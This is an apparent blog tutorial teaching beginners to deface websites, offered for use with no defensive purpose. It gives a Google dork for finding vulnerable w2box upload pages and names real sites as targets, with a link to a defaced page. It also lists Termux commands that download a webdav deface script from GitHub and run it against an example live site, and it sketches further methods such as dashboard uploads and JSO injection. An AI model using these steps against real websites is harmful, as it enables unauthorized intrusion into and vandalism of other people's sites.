To increase hacking skills, now I will share how to deface a website for beginners using several methods that are often used.
This is a simple defacement method, not one used by hackers to break into big websites. In addition, this method also only uses websites that indicated vuln / vulnerable.
Here is the deface method I will share:
To complete the , here is a brief description of deface.
Website defacement is the destruction of the appearance of the website by changing the home display or adding new pages on the website which is carried out by the defacer (deface actor).. The purpose of defacement is generally for personal interests such as ability testing, wanting to be recognized, asking for payment, or just self-gratification.
Based on a survey from the omcyber group, the goal for beginners to deface is to show off to the group because there is an identity (hacker name) on a site. Even though it was only the result of changing the writing in the uploaded deface script code.
You can also do this by following this guide.
How to deface a website using Android
To make it easier and can be directly practiced, so I chose android as a tool. For PCs you can too, because it only uses chrome in the process. Here are the steps to deface from android.
- Open the Google Chrome application to find the target website.
- Enter query dork in the chrome address box to find the vuln site. This is the query I used before, intext:powered by w2box.
- Select site from google dork search results. All sites that are displayed are already indicated vuln, so please choose which one. If I’ve tried to pixelindustry.co.nz.
- Upload the deface script in the file upload box on the target site. This script determines the appearance of the defaced page. The format can be .jpg or .txt. I have listed an example below.
- Access the new defaced page. How to type target site name/data/script name or a quick way to click directly on the uploaded file on the page.
If successful, the site will display the contents of the script that you uploaded. So make the script as attractive as possible and include your identity to make it look pro.
This is an example of my defaced result page.
http://www.pixelindustry.co.nz/w2box/data/hack%20by%20omcyber_com.jpg
Well, that’s a simple way to deface a website. So for beginners, you can definitely practice it. The reason is because the target website has been declared vulnerable.
Apart from the above method, there is another way that is also easier, namely using the termux application.
How to deface a website using termux
Termux is an android application to run scripts, one of which is deface scripts. This script works automatically based on the data entered when the script runs.
So in order to be able to deface a website using termux, you have to install the deface script then run it to find the live target and enter other data such as dork and html scripts.
The most popular and easy to use termux deface script is webdav. Here’s how to install and use webdav in termux.
Here’s how to use webdav to deface
1. Install the webdav source code to termux
Open termux application, then enter this command.
pkg install wget python2 openssh libcurl openssl curl pip2 install urllib3 chardet certifi idna requests wget https://raw.githubusercontent.com/storiku/webdav/master/webdav.py
Press enter for every 1 command line
2. Prepare the mainstay deface script
The format of the script must be .html. To make it the same as the html code of a website page.
For those who already have it, just move the script file outside of any folder but it must be on internal storage.
Then go to termux apk again and write this command.
termux-setup-storage cp -f /sdcard/namascript.html $HOME
Click allow when a notification appears.
The script file must be .html yes, while the name is up to you.
Example:
The script file name is omcyber.html
So the command is
cp -f /sdcard/omcyber.htlm $HOME
3. Run script webdav to start deface
Still in the termux application, type the following command.
python2 webdav.py webtarget scriptdeface.html
Example:
python2 webdav.py http://hq.prospec.co.th/ omcyber.html
This command means, it will deface the web http://hq.prospec.co.th/ with the omcyber.html script
The web http://hq.prospec.co.th/ has detected a vuln, so it should work.
If the targeted website is not vuln, then the termux website defacement method will not work.
To see the results, just access the link that appears from the termux process.
The result is like this.
Well, that’s the webdav method of adding pages to a website with a view that you set yourself.
The webdav tool is not just one, but there are many versions with different uses. I will discuss in a separate post.
Next, just study other methods as I mentioned above.
Website deface method
1. Poc
Poc is a method of defacement by uploading files from the dashboard of the site’s page. File formats can be .txt, .html, .php, and .jpg. To enter the site dashboard, you can take advantage of the CMS website dork which has a gap.
2. Jso
Jso is a way to deface a website by inserting a jso script into a website. This script can be made from the jso generator tool or download it on the internet. The jso upload target is a website that contains a vulnerable registration page with jso queries.
3. Slash index
Same with poc, only different from its use of query dork. Tebas index uses a dork that displays a dashboard index containing folders and files from a website. This index is like a file manager, so you can add and delete files.
4. Webdav
Deface webdav is a deface method by utilizing webdav tools. This tool will search for vuln websites based on webdav queries and then change the visual appearance based on the uploaded sc deface. To run it can use the termux application.
So, those are the 4 easiest ways to deface a website for beginners to practice. In essence, in order for the deface to be successful, the main requirement is that the target website must be vuln. If the website does not show a vulnerability, any method will not work.
Please try and good luck. If there is a problem, don’t hesitate to ask it through the comments column. Thank you
